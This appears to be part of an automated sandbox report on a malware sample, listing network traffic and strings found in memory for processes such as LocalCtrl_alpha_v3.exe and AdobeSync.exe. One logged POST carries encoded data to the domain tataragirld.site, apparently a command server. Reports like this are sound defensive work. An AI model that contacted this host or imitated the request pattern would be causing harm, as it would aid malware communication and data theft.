deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736252351084&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=040C031DFB13691C1F601670FA61685C&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=13987848475950bac8edbe91736252351; XID=13987848475950bac8edbe91736252351
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736252351083&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cd8507b94268428491b16cc06b6a4f34&activityId=cd8507b94268428491b16cc06b6a4f34&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=50B43BAE0D944675912718075641D4BF&MUID=040C031DFB13691C1F601670FA61685C HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=040C031DFB13691C1F601670FA61685C; _EDGE_S=F=1&SID=1621632D55D36AC30139764054C26B23; _EDGE_V=1; SM=T
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: .@5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: .@5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/g.com/msb/;worker-src * blob:X8 equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: @5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/ equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-R5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob: equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1980841681.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rc 'nonce-R5xZ3G5DxduMdjwaP7T9kCajCVFWz7KtIxqiDLKu18Q=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:X8 equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.facebook.comr08X equals www.facebook.com (Facebook)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.youtube.com`r08X equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: time.windows.com
Source: global trafficDNS traffic detected: DNS query: tataragirld.site
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: unknownHTTP traffic detected: POST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0Content-Length: 147Host: tataragirld.site
Source: LVkAi4PBv6.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: LVkAi4PBv6.exe, 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000000.00000000.1353994334.00000000008AB000.00000002.00000001.01000000.00000003.sdmp, LVkAi4PBv6.exe, 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmp, LVkAi4PBv6.exe, 00000002.00000000.1358153893.000000000060B000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047012487.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2073226207.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F57000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047012487.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1978883225.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034065698.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: AdobeSync.exe, 00000003.00000002.1393381948.0000000008473000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1457961617.0000000008072000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685366173.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000002.2207694719.00000000026AC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/Char
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843774604.0000000007EF8000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1945676490.0000000007F26000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2007096878.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.nel.measure.office.net/?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR30r4c&FrontEnd=AF
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1978505959.0000000007F13000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2031475756.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tt.jscc
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977443665.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2032970902.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msOZa.img
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1994802779.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2033853901.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2007839232.0000000007F6B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2047179004.0000000007F5B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2060867589.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msyCF.img
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msB1P
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034926704.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/BB1msB1PLast-Modified:
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Char
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2047550996.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1992114443.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacyr
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2073866489.0000000007F57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2033501954.0000000007F21000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1977982579.0000000007F1F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/&l
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2046806866.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1975937524.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2034574518.0000000002E92000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2019584697.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2096732268.0000000007F16000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1980037435.0000000007EFC000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2108273562.0000000007F07000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2034339884.0000000007EFC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/om
